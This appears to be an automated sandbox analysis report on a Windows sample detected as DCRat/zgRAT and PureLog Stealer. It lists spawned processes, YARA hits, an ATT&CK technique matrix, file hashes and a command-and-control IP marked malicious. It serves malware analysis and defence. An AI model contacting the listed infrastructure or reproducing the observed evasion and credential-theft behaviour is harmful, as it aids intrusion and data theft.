                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\JRGN3N9ZXF.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aehWhM7TGU.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cWXsH5vMZ0.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\pFxSEGDzP3.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yJr0BespZg.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bgR6NVhjy4.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bqMLTwU6O8.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\4XCyKdTKaY.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe "C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe"
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Process created: unknown unknown
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Queries volume information: C:\Users\user\Desktop\KPFv8ATDx0.exe VolumeInformation
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Queries volume information: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1465705448.000000001B7A1000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1464472681.000000001B78A000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1725545102.000000001B07D000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1864743481.000000001BC78000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1986309104.000000001BB47000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B148000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2218403109.000000001B0CE000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B187000.00000004.00000020.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2361787520.000000001B21D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                            Stealing of Sensitive Information

                            Source: Yara match File source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: KPFv8ATDx0.exe PID: 7272, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: oqWNZWQNWoNnROlqjKcKhLM.exe PID: 7644, type: MEMORYSTR
                            Source: Yara match File source: KPFv8ATDx0.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.KPFv8ATDx0.exe.3a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, type: DROPPED

                            Remote Access Functionality

                            Source: Yara match File source: 00000000.00000002.1346120798.0000000012961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara match File source: Process Memory Space: KPFv8ATDx0.exe PID: 7272, type: MEMORYSTR
                            Source: Yara match File source: Process Memory Space: oqWNZWQNWoNnROlqjKcKhLM.exe PID: 7644, type: MEMORYSTR
                            Source: Yara match File source: KPFv8ATDx0.exe, type: SAMPLE
                            Source: Yara match File source: 0.0.KPFv8ATDx0.exe.3a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match File source: 00000000.00000000.1295138767.00000000003A2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara match File source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, type: DROPPED

                            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 133 Masquerading | OS Credential Dumping | 251 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Software Packing | DCSync | 34 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                            [Behavior graph: ID 1558732, Sample: KPFv8ATDx0.exe, Startdate: 19/11/2024, Architecture: WINDOWS, Score: 100]

                            Source | Detection | Scanner | Label
                            KPFv8ATDx0.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat
                            KPFv8ATDx0.exe | 100% | Avira | HEUR/AGEN.1329680
                            KPFv8ATDx0.exe | 100% | Joe Sandbox ML |
                            No Antivirus matches
                            No Antivirus matches
                            Source | Detection | Scanner | Label
                            http://38.180.228.120 | 0% | Avira URL Cloud | safe
                            No contacted domains info
                            Name: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: KPFv8ATDx0.exe, 00000000.00000002.1338858265.0000000003270000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmp
                            Malicious: false
                            Reputation: high

                            Name: http://38.180.228.120
                            Source: oqWNZWQNWoNnROlqjKcKhLM.exe, 00000007.00000002.1443752211.000000000325A000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000000E.00000002.1575711347.0000000003576000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000014.00000002.1687002549.0000000002B97000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000001A.00000002.1826603287.0000000003882000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000022.00000002.1931052438.0000000002E6C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000028.00000002.2055005973.000000000290C000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000002E.00000002.2158413526.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 00000034.00000002.2284751701.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, oqWNZWQNWoNnROlqjKcKhLM.exe, 0000003A.00000002.2425833967.000000000368A000.00000004.00000800.00020000.00000000.sdmp
                            Malicious: true
                            Antivirus Detection: Avira URL Cloud: safe
                            Reputation: unknown
                              IP | Domain | Country | ASN | ASN Name | Malicious
                              38.180.228.120 | unknown | United States | 174 | COGENT-174US | true
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1558732
                              Start date and time:2024-11-19 18:51:08 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 13m 19s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:72
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:KPFv8ATDx0.exe
                              renamed because original name is a hash value
                              Original Sample Name:3ff58b353cd7e1b70eb300561e146e6c.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@83/166@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: KPFv8ATDx0.exe
                              Time | Type | Description
                              12:52:22 | API Interceptor | 9x Sleep call for process: oqWNZWQNWoNnROlqjKcKhLM.exe modified
                              No context
                              No context
                              No context
                              Match: C:\Users\user\Desktop\ACAUZvYN.log
                              Associated Sample Name / URL | Detection | Threat Name
                              T0jSGXdxX5.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              main.exe | malicious | DCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRAT
                              file_1443.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              lsass.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              t8xf0Y1ovi.exe | malicious | DCRat
                              dvc2TBOZTh.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              teh76E2k50.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              FuWRu2Mg82.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              auXl1Tzyme.exe | malicious | DCRat, PureLog Stealer, zgRAT
                              9D7RwuJrth.exe | malicious | DCRat, PureLog Stealer, zgRAT
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (804), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):804
                                                  Entropy (8bit):5.901464329550629
                                                  Encrypted:false
                                                  SSDEEP:24:tQM34Ah5SWMNWLUJGH1m0S9/LRqnOBNN8Jon:tQmV9LqOm0oonOBNNKon
                                                  MD5:AC30216A342168C423A34D3C83403D2A
                                                  SHA1:AF938A1CBF6ED1C76013C76A2202EA7E9644957A
                                                  SHA-256:2457BEC6B72DCCCA0838EF36A62A021669132FB56AADB36146A980A03E545207
                                                  SHA-512:B1FAC2221BB52AB04AF02910C4C6F88F3052AA8C7F3A2169B0EB8BE62FC2DFF15C9799AA0FD76C628305151668FDBE70902A846BAE3BE656AC92F9DF5F801E49
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-GB\oqWNZWQNWoNnROlqjKcKhLM.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................+...........,.. ... ,...@.. .......................`,...........@.................................`.,.K.... ,.p....................@,...................................................... ............... ..H............text.....+.. ....+................. ..`.rsrc...p.... ,.......+.............@....reloc.......@,.......+.............@..B..................,.....H...........H.......n......./!...,......................................0..........(.... ........8........E........*...9.......8....*(.... ....~d...{....:....& ....8....(.... ....8....(.... ....~d...{s...:....& ....8........0.......... ........8........E....5...).......E...........80...8*... ....~d...{....:....& ....8....r...ps....z*...... ....8........~....(]...~....(a... ....?.... ....~d...{m...:h...& ....8]...~....(U... .... .... ....s....~....(Y....... ....8'...~....9o..
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (707), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):707
                                                  Entropy (8bit):5.872700467054722
                                                  Encrypted:false
                                                  SSDEEP:12:RdLORN2vco3zWPZw+W5oyLNDX4WAje6cknAE9epiSK4zp4dckCZG+4AVgIRQNuCQ:/CNYzWqbiyhXxPIN9egap44jTQuCQOpm
                                                  MD5:3C8E4D478AB3CDB31C89736FE9CFAD04
                                                  SHA1:5A1BA25559AF4D1100366114AD1420D59FECEEE9
                                                  SHA-256:8EA74ED1BEB324B482CF6E4ED6379BD625A4BC1670EC493280C184FA70B9BA53
                                                  SHA-512:768C4167FD68B4DB2D9524D18BAF93F4B148DDA0492ECC79CE333D5DA54C0448E605DE5FCB21FC23641AB667A4071A1B91D375488BAF79A7CCB9AC3214B175F1
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with very long lines (775), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):775
                                                  Entropy (8bit):5.880971557781576
                                                  Encrypted:false
                                                  SSDEEP:24:Kmc8fxzsgDqPomnLcLUi96IODdwjbgNbW:KmcAxzsoqPo+WUa6Rwjb+W
                                                  MD5:B2E90DE55693C31DE23D73D304A9C50A
                                                  SHA1:F28E45AB2FE92A78DD9C8B49E3BEF8F9848F77FC
                                                  SHA-256:8F0E9AA53EC4AFDDE2618A0302E69C5D599846AF1A05D2629B037528F76C917C
                                                  SHA-512:263051E2B74898195D043B962935323CB1CEF52A696C4E8EDCA736B5EF83E97DC7C10E0B9BF416CEB47BCF671D4F12469673F3024BF58C33351096CDC26829B4
                                                  Malicious:false
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2882048
                                                  Entropy (8bit):7.745071784980981
                                                  Encrypted:false
                                                  SSDEEP:49152:doz78EGeqP/Zmz0nTgMRMD69C5XO8ArPoD2W89weVBeLQ4:doX8aIZLMD6k+8aPM2W8WCes4
                                                  MD5:3FF58B353CD7E1B70EB300561E146E6C
                                                  SHA1:D9059F5389FAD25F1BF44B7332C018F806159DF9
                                                  SHA-256:15892ECB245A5C3AA1AB94D60ED1D034540B14623BDC6F27ACFA1F0A5791ED33
                                                  SHA-512:7F2E55642CB0229C5F0BBA1A6C7930855258B3FBEE3AB033D1802C157C4AFEC02750B1B7339AFEB7E0BC265FE452D94D7D9826BCF28DC657496DF0BE43E6E935
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:false
                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                  Process:C:\Users\user\Desktop\KPFv8ATDx0.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1698
                                                  Entropy (8bit):5.367720686892084
                                                  Encrypted:false
                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4x:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4x
                                                  MD5:2C0A3C5388C3FAAFA50C8FB701A28891
                                                  SHA1:D75655E5C231DE60C96FD196658C429E155BEB0F
                                                  SHA-256:A44CB861DDF882F48202B95D3A8A535419C1AE0386666C84B803F9810473EDD7
                                                  SHA-512:0343301C34ED4FEB7EFF30186862EBC7446E6044955B3088B0BE0D86A3DACAE1BFC407A59D385E9CBB7A0DEF210DC3405FD442A598FD28431371E249F748258A
                                                  Malicious:true
